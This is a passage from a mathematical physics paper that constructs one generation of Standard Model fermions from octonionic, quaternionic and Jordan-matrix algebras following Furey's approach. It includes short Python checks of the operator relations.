\[\begin{split} S^{d}\equiv&\qquad\bar{\nu}\omega^{ \dagger}\omega\\ -d^{r}\alpha_{1}\omega^{\dagger}\omega&-d^{g}\alpha_{2} \omega^{\dagger}\omega&-d^{b}\alpha_{3}\omega^{\dagger}\omega\\ +\bar{u}^{r}\alpha_{3}\alpha_{2}\omega^{\dagger}\omega& +\bar{u}^{g}\alpha_{1}\alpha_{3}\omega^{\dagger}\omega& +\bar{u}^{b}\alpha_{2}\alpha_{1}\omega^{\dagger}\omega\\ +e\alpha_{1}\alpha_{2}\alpha_{3}\omega^{\dagger}\omega\end{split}. \tag{87}\] These algebraic operators represent charge states associated with one generation of the Standard Model with reference to \(SU(3)_{c}\times U(1)_{em}\). 
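The relations (84) can also be re-checked numerically without Mathematica. The sketch below (ours, not the authors') builds the octonions by Cayley–Dickson doubling of the quaternions; this fixes one Fano-plane orientation, which need not coincide with the basis convention above, but the anticommutators in (84) rely only on the orthonormality of the imaginary units \(e_{1},\ldots,e_{7}\) and on alternativity, so they hold in any convention. The ladder operators are implemented as left-multiplication maps on \(\mathbb{C}\otimes\mathbb{O}\), i.e. as elements of the chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\). All helper names are hypothetical.

```python
import numpy as np

# Octonions via Cayley-Dickson doubling of the quaternions: an octonion is a pair
# (a, b) of quaternions with (a, b)(c, d) = (ac - conj(d) b, d a + b conj(c)).
# Basis: e0 = 1, e1 = i, e2 = j, e3 = k, e4 = (0, 1), e5 = (0, i), e6 = (0, j), e7 = (0, k).

def qmul(a, b):
    w1, x1, y1, z1 = a; w2, x2, y2, z2 = b
    return np.array([w1*w2 - x1*x2 - y1*y2 - z1*z2,
                     w1*x2 + x1*w2 + y1*z2 - z1*y2,
                     w1*y2 - x1*z2 + y1*w2 + z1*x2,
                     w1*z2 + x1*y2 - y1*x2 + z1*w2])

def qconj(a):
    return np.array([a[0], -a[1], -a[2], -a[3]])

def omul(x, y):
    a, b = x[:4], x[4:]; c, d = y[:4], y[4:]
    return np.concatenate([qmul(a, c) - qmul(qconj(d), b),
                           qmul(d, a) + qmul(b, qconj(c))])

# C (x) O: 16 real coefficients, the first 8 for the O part, the last 8 for the I*O part.
def comul(x, y):
    p, q = x[:8], x[8:]; r, s = y[:8], y[8:]
    return np.concatenate([omul(p, r) - omul(q, s), omul(p, s) + omul(q, r)])

def ladder(i, dagger):
    """alpha_i = (-e_{i+4} + I e_i)/2 and alpha_i^dag = (e_{i+4} + I e_i)/2 as 16-vectors."""
    g = np.zeros(16)
    g[i + 4] = 0.5 if dagger else -0.5   # octonionic part
    g[8 + i] = 0.5                       # I-part
    return g

def anticomm(g1, g2, f):
    """{g1, g2} f = g1 (g2 f) + g2 (g1 f): the nested (chain-algebra) left action."""
    return comul(g1, comul(g2, f)) + comul(g2, comul(g1, f))

rng = np.random.default_rng(1)
f = rng.normal(size=16)                  # arbitrary element of C (x) O
for i in (1, 2, 3):
    for j in (1, 2, 3):
        assert np.allclose(anticomm(ladder(i, False), ladder(j, True), f),
                           (f if i == j else 0.0))
        assert np.allclose(anticomm(ladder(i, False), ladder(j, False), f), 0.0)
        assert np.allclose(anticomm(ladder(i, True),  ladder(j, True),  f), 0.0)
print("relations (84) hold for this basis")
```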
A notion of Pauli's exclusion principle is found, since the following relations hold, \[\begin{split}\omega\omega^{\dagger}\omega\omega^{\dagger}& =\omega\omega^{\dagger},\\ \alpha_{i}^{\dagger}\omega\omega^{\dagger}\omega\omega^{\dagger}& =\alpha_{i}^{\dagger}\omega\omega^{\dagger}\\ \alpha_{i}^{\dagger}\omega\omega^{\dagger}\alpha_{i}^{\dagger} \omega\omega^{\dagger}&=\alpha_{i}^{\dagger}\alpha_{j}^{ \dagger}\omega\omega^{\dagger}\alpha_{i}^{\dagger}\alpha_{j}^{\dagger}\omega \omega^{\dagger}=\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{\dagger} \omega\omega^{\dagger}\alpha_{3}^{\dagger}\alpha_{2}^{\dagger}\alpha_{1}^{ \dagger}\omega\omega^{\dagger}=0.\end{split} \tag{88}\] The above equations imply that it is impossible to create two identical fermionic states. As implied, the three raising/lowering operators are associated with three color charges. Furey also demonstrated that the electric charge is associated with the mean of the number operators \(N_{i}=\alpha_{i}^{\dagger}\alpha_{i}\)[15]. To obtain spinors associated with these charge configurations, Furey advocates for \((\mathbb{C}\otimes\mathbb{H})\otimes_{\mathbb{C}}(\mathbb{C}\otimes\mathbb{O})= \mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Before reviewing this procedure, we first generalize the results of \(\mathbb{C}\otimes\mathbb{O}\) to \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). ### Uplift of \(\mathbb{C}l(6)\) in \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) Next, the analogous raising and lowering operators associated with one generation of the Standard Model are constructed with elements of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\). Our guiding principle is to take elements of \(\mathbb{C}\otimes\mathbb{O}\), place them on the upper off-diagonal component of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\), and add the Hermitian octonionic conjugate. We seek a new generalized multiplication that implements the same particle dynamics as \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\). For concreteness, consider \(J_{f}\) as an arbitrary element of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\), \[J_{f}=\left(\begin{array}{cc}f_{8}&f\\ \tilde{f}&f_{9}\end{array}\right)=\left(\begin{array}{cc}f_{8}&f_{0}+\sum_{i= 1}^{7}e_{i}f_{i}\\ f_{0}-\sum_{i=1}^{7}e_{i}f_{i}&f_{9}\end{array}\right), \tag{89}\] where \(f_{i}=f_{i,0}+If_{i,1}\) for \(i=0,1,\ldots,9\). The Jordan product is utilized to restore elements of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). However, this conflicts with left multiplication utilized in the chain algebra \(\mathbb{C}\otimes\overleftarrow{\mathbb{C}}\). The natural multiplication for \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) used throughout uses a nested commutator of Jordan products, \[m_{7}\left(J_{1},J_{2},J_{f}\right)\equiv J_{1}\circ\left(J_{2}\circ J_{f} \right)-J_{2}\circ\left(J_{1}\circ J_{f}\right), \tag{90}\] where \(J_{1},J_{2}\in\mathbb{C}\otimes J_{2}(\mathbb{O})\) as arbitrary elements. Rather than having a single element of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\) to implement \(\alpha_{i}\) and \(\alpha_{j}^{\dagger}\), the multiplication above is utilized. 
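As a sanity check on the definition (90), note that if the matrix entries were drawn from an associative algebra, the nested commutator of Jordan products would collapse to an ordinary commutator, \(m_{7}(J_{1},J_{2},J_{f})=\frac{1}{4}\left[[J_{1},J_{2}],J_{f}\right]\). The short NumPy sketch below (ordinary complex matrices, so purely illustrative and not the authors' code) verifies this identity; it is the non-associativity of the octonionic entries that makes \(m_{7}\) on \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) richer than a plain commutator.

```python
import numpy as np

rng = np.random.default_rng(2)
J1, J2, Jf = (rng.normal(size=(4, 4)) + 1j * rng.normal(size=(4, 4)) for _ in range(3))

jordan = lambda A, B: 0.5 * (A @ B + B @ A)   # Jordan product
comm   = lambda A, B: A @ B - B @ A           # ordinary commutator

m7 = jordan(J1, jordan(J2, Jf)) - jordan(J2, jordan(J1, Jf))   # Eq. (90)
assert np.allclose(m7, 0.25 * comm(comm(J1, J2), Jf))
print("for associative entries, m7 = (1/4)[[J1, J2], Jf]")
```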
The following \(\mathbb{C}\otimes\mathbb{O}\) variables are first uplifted to elements of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\), \[J_{\alpha_{0}} \equiv\left(\begin{array}{cc}0&\alpha_{0}\\ \tilde{\alpha}_{0}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{4}+I\\ e_{4}+I&0\end{array}\right),\] \[J_{\alpha_{1}} \equiv\left(\begin{array}{cc}0&\alpha_{1}\\ \tilde{\alpha}_{1}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{5}+e_{1}I\\ e_{5}-e_{1}I&0\end{array}\right),\] \[J_{\alpha_{2}} \equiv\left(\begin{array}{cc}0&\alpha_{2}\\ \tilde{\alpha}_{2}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{6}+e_{2}I\\ e_{6}-e_{2}I&0\end{array}\right),\] \[J_{\alpha_{3}} \equiv\left(\begin{array}{cc}0&\alpha_{3}\\ \tilde{\alpha}_{3}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&- e_{7}+e_{3}I\\ e_{7}-e_{3}I&0\end{array}\right),\] \[J_{\tilde{\alpha}_{0}} \equiv\left(\begin{array}{cc}0&\tilde{\alpha_{0}}\\ \alpha_{0}&0\end{array}\right)=\frac{1}{2}\left(\begin{array}{cc}0&e_{4}+I \\ -e_{4}+I&0\end{array}\right), \tag{91}\] \[J_{\alpha_{1}^{\dagger}} \equiv\left(\begin{array}{cc}0&\alpha_{1}^{\dagger}\\ \tilde{\alpha}_{1}^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array} []{cc}0&e_{5}+e_{1}I\\ -e_{5}-e_{1}I&0\end{array}\right),\] \[J_{\alpha_{2}^{\dagger}} \equiv\left(\begin{array}{cc}0&\alpha_{2}^{\dagger}\\ \tilde{\alpha}_{2}^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array} []{cc}0&e_{6}+e_{2}I\\ -e_{6}-e_{2}I&0\end{array}\right),\] \[J_{\alpha_{3}^{\dagger}} \equiv\left(\begin{array}{cc}0&\alpha_{3}^{\dagger}\\ \tilde{\alpha}_{3}^{\dagger}&0\end{array}\right)=\frac{1}{2}\left(\begin{array} []{cc}0&e_{7}+e_{3}I\\ -e_{7}-e_{3}I&0\end{array}\right),\] where \(\alpha_{0}=-e_{4}+I\) was introduced for later convenience. We also introduce \(J_{I\alpha_{i}}=IJ_{\alpha_{i}}\) as a shorthand. 
These matrices allow for the following nested multiplications to mimic the action of \(\alpha_{i}\) and \(\alpha_{j}^{\dagger}\), \[m_{\alpha_{1}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\tilde{\alpha}_{0}},J_{\alpha_{1}},J_{f} \right)+m_{7}\left(J_{I\alpha_{1}^{\dagger}},J_{\alpha_{3}^{\dagger}},J_{f} \right)\right),\] \[m_{\alpha_{2}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\tilde{\alpha}_{0}},J_{\alpha_{2}},J_{f} \right)+m_{7}\left(J_{I\alpha_{3}^{\dagger}},J_{\alpha_{1}^{\dagger}},J_{f} \right)\right),\] \[m_{\alpha_{3}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\tilde{\alpha}_{0}},J_{\alpha_{3}},J_{f} \right)+m_{7}\left(J_{I\alpha_{1}^{\dagger}},J_{\alpha_{2}^{\dagger}},J_{f} \right)\right),\] \[m_{\alpha_{1}^{\dagger}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\alpha_{0}},J_{\alpha_{1}^{\dagger}},J_{f} \right)+m_{7}\left(J_{I\alpha_{2}},J_{\alpha_{3}},J_{f}\right)\right), \tag{92}\] \[m_{\alpha_{2}^{\dagger}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\alpha_{0}},J_{\alpha_{2}^{\dagger}},J_{f} \right)+m_{7}\left(J_{I\alpha_{3}},J_{\alpha_{1}},J_{f}\right)\right),\] \[m_{\alpha_{3}^{\dagger}}\left(J_{f}\right) =2\left(m_{7}\left(J_{I\alpha_{0}},J_{\alpha_{3}^{\dagger}},J_{f} \right)+m_{7}\left(J_{I\alpha_{1}},J_{\alpha_{2}},J_{f}\right)\right).\] The following anticommutation relations were explicitly verified, \[\left\{m_{\alpha_{i}},m_{\alpha_{j}^{\dagger}}\right\}J_{f} \equiv m_{\alpha_{i}}\left(m_{\alpha_{j}^{\dagger}}\left(J_{f} \right)\right)+m_{\alpha_{j}^{\dagger}}\left(m_{\alpha_{i}}\left(J_{f} \right)\right)=\delta_{ij}J_{f}^{\rm off},\] \[\left\{m_{\alpha_{i}},m_{\alpha_{j}}\right\}J_{f} \equiv m_{\alpha_{i}}\left(m_{\alpha_{j}}\left(J_{f}\right)\right)+m_ {\alpha_{j}}\left(m_{\alpha_{i}}\left(J_{f}\right)\right)=0, \tag{93}\] \[\left\{m_{\alpha_{1}^{\dagger}},m_{\alpha_{j}^{\dagger}}\right\}J_{f} \equiv m_{\alpha_{i}^{\dagger}}\left(m_{\alpha_{j}^{\dagger}}\left(J_{f} \right)\right)+m_{\alpha_{i}^{\dagger}}\left(m_{\alpha_{i}^{\dagger}}\left(J_{f} \right)\right)=0,\] where \(J_{f}^{\rm off}\) contains only the off-diagonal components of \(J_{f}\). This suffices to generalize the fermionic degrees of freedom from \(\mathbb{C}\otimes\mathbb{O}\) since they are uplifted to the off-diagonals of \(\mathbb{C}\otimes J_{2}(\mathbb{O})\). As an abuse of notation, \(m_{\alpha_{i}}m_{\alpha_{j}}\) is shorthand for \(m_{\alpha_{i}}\left(m_{\alpha_{j}}\left(J_{f}\right)\right)\). The nilpotent operator of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\) is given by \(m_{\omega}\), \[m_{\omega}=m_{\alpha_{1}}m_{\alpha_{2}}m_{\alpha_{3}},\quad m_{\omega^{\dagger}} =m_{\alpha_{3}^{\dagger}}m_{\alpha_{2}^{\dagger}}m_{\alpha_{1}^{\dagger}} \tag{94}\] One may verify that \(m_{\omega}m_{\omega}=m_{\omega^{\dagger}}m_{\omega^{\dagger}}=0\), while \(m_{\omega}m_{\omega^{\dagger}}\) acts on \(J_{f}\) to give a generalized minimal ideal of \(\mathbb{C}\otimes\overleftarrow{J_{2}(\mathbb{O})}\), \[m_{\omega}m_{\omega^{\dagger}}J_{f}=\left(\begin{array}{cc}0&\omega\omega^{ \dagger}f\\ \left(\omega\omega^{\dagger}f\right)^{*\dagger}&0\end{array}\right)=\frac{1}{2 }\left(\begin{array}{cc}0&f_{0}\left(1-e_{4}I\right)+f_{4}\left(e_{4}+I \right)\\ f_{0}\left(1+e_{4}I\right)+f_{4}\left(-e_{4}+I\right)&0\end{array}\right), \tag{95}\] where \(f\) is the upper-right component of \(J_{f}\) and \(\left(\omega\omega^{\dagger}f\right)^{*\dagger}\) is a shorthand for the octonionic conjugate. 
This allows for the assignment of a neutrino "vacuum" state, which allows for the following assignments of particles, \[m_{\nu}=m_{\omega}m_{\omega^{\dagger}},\] \[m_{\bar{d}^{r}}=m_{\alpha_{1}^{\dagger}}m_{\omega}m_{\omega^{ \dagger}},\quad m_{\bar{d}^{g}}=m_{\alpha_{2}^{\dagger}}m_{\omega}m_{\omega^{ \dagger}},\quad m_{\bar{d}^{b}}=m_{\alpha_{3}^{\dagger}}m_{\omega}m_{\omega^{ \dagger}}\] \[m_{u^{r}}=m_{\alpha_{3}^{\dagger}}m_{\alpha_{2}^{\dagger}}m_{ \omega}m_{\omega^{\dagger}},\;\;m_{us}=m_{\alpha_{1}^{\dagger}}m_{\alpha_{3}^{ \dagger}}m_{\omega}m_{\omega^{\dagger}},\;\;m_{u^{b}}=m_{\alpha_{2}^{\dagger}} m_{\alpha_{1}^{\dagger}}m_{\omega}m_{\omega^{\dagger}}, \tag{96}\] \[m_{\bar{e}}=m_{\alpha_{3}^{\dagger}}m_{\alpha_{2}^{\dagger}}m_{ \alpha_{1}^{\dagger}}m_{\omega}m_{\omega^{\dagger}},\] and \[m_{\bar{\nu}}=m_{\omega^{\dagger}}m_{\omega},\] \[m_{d^{r}}=-m_{\alpha_{1}}m_{\omega^{\dagger}}m_{\omega},\;\;\;m_ {d^{g}}=-m_{\alpha_{2}}m_{\omega^{\dagger}}m_{\omega},\quad m_{d^{b}}=-m_{ \alpha_{3}}m_{\omega^{\dagger}}m_{\omega}\] \[m_{\bar{u}^{r}}=m_{\alpha_{3}}m_{\alpha_{2}}m_{\omega^{\dagger}}m _{\omega},\;\;m_{\bar{u}\bar{s}}=m_{\alpha_{1}}m_{\alpha_{3}}m_{\omega^{ \dagger}}m_{\omega},\;\;m_{\bar{u}\bar{b}}=m_{\alpha_{2}}m_{\alpha_{1}}m_{ \omega^{\dagger}}m_{\omega}, \tag{97}\] \[m_{e}=m_{\alpha_{3}}m_{\alpha_{2}}m_{\alpha_{1}}m_{\omega^{ \dagger}}m_{\omega}.\] In summary, the collection of weak-isospin up and down states are \[m^{u}\left(\nu,\bar{d}^{r},\bar{d}^{g},\bar{d}^{b},u^{r},u^{g},u^ {b},\bar{e}\right)=\nu m_{\nu}+\bar{d}^{r}m_{\bar{d}^{r}}+\bar{d}^{g}m_{\bar{d} ^{g}}+\bar{d}^{b}m_{\bar{d}^{b}}+u^{r}m_{u^{r}}+u^{g}m_{u^{g}}+u^{b}m_{u^{b}}+ \bar{e}m_{\tilde{e}},\] \[m^{d}\left(\bar{\nu},d^{r},d^{g},d^{b},\bar{u}^{r},\bar{u}^{g}, \bar{u}^{b},e\right)=\bar{\nu}m_{\bar{\nu}}+d^{r}m_{d^{r}}+d^{g}m_{d^{g}}+d^{b}m _{d^{b}}+\bar{u}^{r}m_{\bar{u}^{r}}+\bar{u}^{g}m_{\bar{u}^{g}}+\bar{u}^{b}m_{ \bar{u}^{b}}+em_{e}, \tag{98}\] where \(\nu,\bar{d}^{r}\), etc. are complex coefficients. ## VI Projective lines over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) ### One generation from \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) Furey provided a formulation of the electroweak sector [14], which led to the Standard Model embedded in \(SU(5)\) and allows for \(U(1)_{B-L}\) symmetry [14, 15]. The construction relies on identifying \(\mathbb{C}l(10)=\mathbb{C}l(6)\otimes_{\mathbb{C}}\mathbb{C}l(4)\), which can be found from a double-sided chain algebra over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). For instance, the left- and right-chiral spinors can be brought together via \(\psi_{D}=\psi_{R}+\psi_{L}\) with the gamma matrices implemented as \[\gamma^{0}=1\left|Ii,\quad\gamma^{1}=Ii\right|j,\quad\gamma^{2}=Ij\left|j, \quad\gamma^{3}=Ik\right|j, \tag{99}\] where \(a|b\) acting on \(z\) is \(azb\), which is well-defined when \((az)b=a(zb)\). This allows for left and right action of \(\mathbb{C}\otimes\mathbb{H}\) to give \(\mathbb{C}l(4)=\mathbb{C}l(2)\otimes_{\mathbb{C}}\mathbb{C}l(2)\). This idea can be taken further to give \(\mathbb{C}l(10)\) to identify \(Spin(10)\) and make contact with \(SU(3)\times SU(2)\times U(1)\) for the Standard Model. In this manner, \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) allows for \(Spin(10)\) to act from the left. While the full \(\mathbb{C}l(4)\) spacetime algebra cannot be found, the remaining right action remarkably picks out \(SL(2,\mathbb{C})\) as \(SU(2)_{\mathbb{C}}\). 
A collection of left-chiral Weyl spinors in the \((\mathbf{2},\mathbf{1},\mathbf{16})\) representation of \(SL(2,\mathbb{C})\times Spin(10)\) also contains degrees of freedom for right-chiral antiparticles with opposite charges via \((\mathbf{1},\mathbf{2},\mathbf{16})\), which leads to a physicist's convention to ignore writing down the conjugate representation. Each of the \(16\) Weyl spinors is an element of \(\mathbb{C}^{2}\). When working with \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\), there are no two-component vectors, so it is necessary to find two copies of \(\mathbf{16}\). When Furey explored \(\mathbb{C}l(10)\) from \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\), a \(\mathbf{16}\) with its conjugate representation was found, instead of two \(\mathbf{16}\)'s to give \((\mathbf{2},\mathbf{1},\mathbf{16})\) for a single generation of Standard Model fermions. This led to the so-called fermion doubling problem. Recent work by Furey and Hughes introduced fermions in the non-associative \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) algebra to solve this fermion doubling problem, which can be resolved by taking a slightly different route to \(Spin(10)\), rather than taking bivectors of \(\mathbb{C}l(10)\)[11]. Instead, consider the following generalization of Pauli matrices, \[\sigma_{i}=-e_{i}j|1,\quad\sigma_{8}=-Ii|1,\quad\sigma_{9}=-Ik|1,\quad\sigma_{10 }=-I|1, \tag{100}\] where \(i=1,\ldots,7\) and \(\{\sigma_{i},\sigma_{8},\sigma_{9}\}\) allow for a basis of \(\mathbb{C}l(9)\). The ten "generators" \(\sigma_{I}\) for \(I=1,\ldots,10\) lead to transformations on \(f\) via \[\frac{1}{2}\sigma_{[I}\bar{\sigma}_{J]}\psi=\frac{1}{4}\left(\sigma_{I}\left( \bar{\sigma}_{J}f\right)-\sigma_{J}\left(\bar{\sigma}_{I}f\right)\right), \tag{101}\] where \(\bar{\sigma}_{a}=-\sigma_{a}\) for \(a=1,\ldots,9\) and \(\bar{\sigma}_{10}=\sigma_{10}\). This allows for \(Spin(10)\) to act on a Weyl spinor in the \(\mathbf{16}\) representation instead of two \(1\)-component objects of \(\mathbf{16}\oplus\overline{\mathbf{16}}\) to resolve the fermion doubling problem. With \(\alpha_{\mu}=(Il^{*},q_{1},q_{2},q_{3})\) and \(\alpha_{\mu}^{*}=(-Il,q_{1}^{*},q_{2}^{*},q_{3}^{*})\) for \(\mu=0,1,2,3\) as an electrostrong sector and \(\epsilon_{\alpha\beta}\) with \(\alpha=\uparrow,\downarrow\) as an electroweak sector, the non-associative algebra \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be used to implement particle states for a single generation of the Standard Model fermions. 
We specify the particle states by using the notation and assignments recently introduced by Furey and Hughes in their solution to the fermion doubling problem [11], namely \[\psi =\left(\mathcal{V}_{L}^{\uparrow}\epsilon_{\uparrow\uparrow}+ \mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{E}_{L}^{ \uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{E}_{L}^{\downarrow}\epsilon_{ \downarrow\downarrow}\right)l+\left(\mathcal{E}_{R}^{\downarrow*}\epsilon_{ \uparrow\uparrow}-\mathcal{E}_{R}^{\uparrow*}\epsilon_{\uparrow\downarrow}- \mathcal{V}_{R}^{\downarrow*}\epsilon_{\downarrow\uparrow}+\mathcal{V}_{R}^{ \uparrow*}\epsilon_{\downarrow\downarrow}\right)l^{*} \tag{102}\] \[\quad-I\left(\mathcal{U}_{L}^{\sigma\dagger}\epsilon_{\uparrow \uparrow}+\mathcal{U}_{L}^{a\downarrow}\epsilon_{\uparrow\downarrow}+ \mathcal{D}_{L}^{\sigma\dagger}\epsilon_{\downarrow\uparrow}+\mathcal{D}_{L}^{a \downarrow}\epsilon_{\downarrow\downarrow}\right)q_{a}+I\left(\mathcal{D}_{R}^ {a\downarrow*}\epsilon_{\uparrow\uparrow}-\mathcal{D}_{R}^{a\uparrow*} \epsilon_{\uparrow\downarrow}-\mathcal{U}_{R}^{a\downarrow*}\epsilon_{ \downarrow\uparrow}+\mathcal{U}_{R}^{a\uparrow*}\epsilon_{\downarrow\downarrow} \right)q_{a}^{*}.\] The coefficients such as \(\mathcal{V}_{L}^{\uparrow}\) are complex. In our conventions, the \(SU(3)\) Gell-Mann matrices are represented as elements of \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\) given by \[\Lambda_{1} =-\frac{I}{2}(e_{61}-e_{25}), \Lambda_{2} =-\frac{I}{2}(e_{21}+e_{65}), \tag{103}\] \[\Lambda_{3} =-\frac{I}{2}(e_{26}-e_{15}), \Lambda_{4} =\frac{I}{2}(e_{35}-e_{17}),\] \[\Lambda_{5} =-\frac{I}{2}(e_{31}-e_{57}), \Lambda_{6} =\frac{I}{2}(e_{27}+e_{36}),\] \[\Lambda_{7} =\frac{I}{2}(e_{23}+e_{67}), \Lambda_{8} =\frac{I}{2\sqrt{3}}(e_{26}+e_{15}-e_{37}),\] where \(e_{ij}f\) stands for \(e_{i}(e_{j}f)\). For the electroweak sector with \(SU(2)\times U(1)\) symmetry, the \(SU(2)\) generators are represented in terms of imaginary quaternions and a weak isospin projector \(s=(1-Ie_{4})/2\), \[\tau_{9}=\frac{I}{2}si,\qquad\tau_{10}=\frac{I}{2}sj,\qquad\tau_{11}=\frac{I} {2}sk. \tag{104}\] The weak hypercharge is given by \[Y=-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37}\right)-s^{*}k\right). \tag{105}\] Note that all operators from \(SU(3)\times SU(2)\times U(1)\) are elements of \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\) and act from the left. The electric charge operator \(Q\) is \[Q=\tau_{11}+Y=-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37}\right)-k \right). 
\tag{106}\] By separating \(\psi\) into \(\psi_{l}+\psi_{q}+\psi_{\nu}^{c}+\psi_{e}^{c}+\psi_{u}^{c}+\psi_{d}^{c}\), the following fields are found to correspond to the appropriate representations of the Standard Model, \[(\mathbf{1},\mathbf{2})_{-1/2}: \psi_{l} =\left(\mathcal{V}_{L}^{\uparrow}\epsilon_{\uparrow\uparrow}+ \mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{E}_{L}^{ \uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{E}_{L}^{\downarrow}\epsilon_{ \downarrow\downarrow}\right)l, \tag{107}\] \[(\mathbf{3},\mathbf{2})_{1/6}: \psi_{q} =-I\left(\mathcal{U}_{L}^{\sigma\dagger}\epsilon_{\uparrow \uparrow}+\mathcal{U}_{L}^{a\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{D}_{L}^ {a\uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{D}_{L}^{a\downarrow}\epsilon_{ \downarrow\downarrow}\right)q_{a},\] \[(\mathbf{1},\mathbf{1})_{0}: \psi_{\nu}^{c} =\left(-\mathcal{V}_{R}^{\downarrow*}\epsilon_{\downarrow\uparrow}+ \mathcal{V}_{R}^{\uparrow*}\epsilon_{\downarrow\downarrow}\right)l^{*},\] \[(\mathbf{1},\mathbf{1})_{1}: \psi_{e}^{c} =\left(\mathcal{E}_{R}^{\downarrow*}\epsilon_{\uparrow\uparrow}- \mathcal{E}_{R}^{\uparrow*}\epsilon_{\uparrow\downarrow}\right)l^{*}\] \[(\mathbf{\overline{3}},\mathbf{1})_{-2/3}: \psi_{u}^{c} =I\left(-\mathcal{U}_{R}^{\downarrow*}\epsilon_{\downarrow\uparrow}+ \mathcal{U}_{R}^{\sigma\dagger*}\epsilon_{\downarrow\downarrow}\right)q_{a}^{*},\] \[(\mathbf{\overline{3}},\mathbf{1})_{1/3}: \psi_{d}^{c} =I\left(\mathcal{D}_{R}^{\sigma\downarrow*}\epsilon_{\uparrow\uparrow} -\mathcal{D}_{R}^{\sigma\dagger*}\epsilon_{\uparrow\downarrow}\right)q_{a}^{*},\] where we confirmed that the above states have the appropriate weak hypercharge values as well as weak isospin and electric charges. Note that complex conjugation leads to the appropriate conjugate states, which turns left(right)-chiral particles into right(left)-chiral anti-particles. Finally, the largest algebra commuting with \(\mathfrak{so}_{10}\) derived from \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftrightarrow{\mathbb{O}}\) when considering action from the left and right is given by \(\mathfrak{sl}_{2,\mathbb{C}}\), which are generated by \(\{1|i,1|j,1|k,1|Ii,1|Jj,1|Ik\}\). ### Uplift to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) To uplift the physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), we start by considering \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) uplifted to an off-diagonal matrix \(J_{f}^{\rm off}\in\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\). Our first goal is to understand how to implement left multiplication of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) basis elements on \(f\) by the analogous construction in \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) acting on \(J_{f}^{\rm off}\), where \[J_{f}^{\rm off}=\left(\begin{array}{cc}0&f\\ \tilde{f}&0\end{array}\right). \tag{108}\] For \(\mathbb{C}\otimes\mathbb{H}\) bases, these can be implemented by mapping the basis elements to the same elements times the identity matrix. The same cannot be done for \(\mathbb{O}\), as the elements \(e_{i}\) must map to \(J_{2}(\mathbb{O})\) via the eight off-diagonal octonionic Pauli matrices \(J_{e_{i}}\), \[J_{e_{i}}=\left(\begin{array}{cc}0&e_{i}\\ \tilde{e_{i}}&0\end{array}\right). \tag{109}\] To understand how to multiply \(f\) from the left by \(e_{i}\) generalized to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), the Fano plane is crucial. 
